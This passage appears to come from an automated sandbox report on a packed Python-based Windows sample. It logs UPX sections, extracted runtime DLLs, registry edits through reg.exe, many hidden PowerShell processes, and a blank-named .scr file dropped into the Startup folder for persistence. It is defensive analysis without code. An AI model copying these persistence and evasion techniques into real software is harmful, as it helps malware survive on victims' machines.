              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to dropped file
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the startup folder
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to dropped file
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D5190 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6313D5190
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
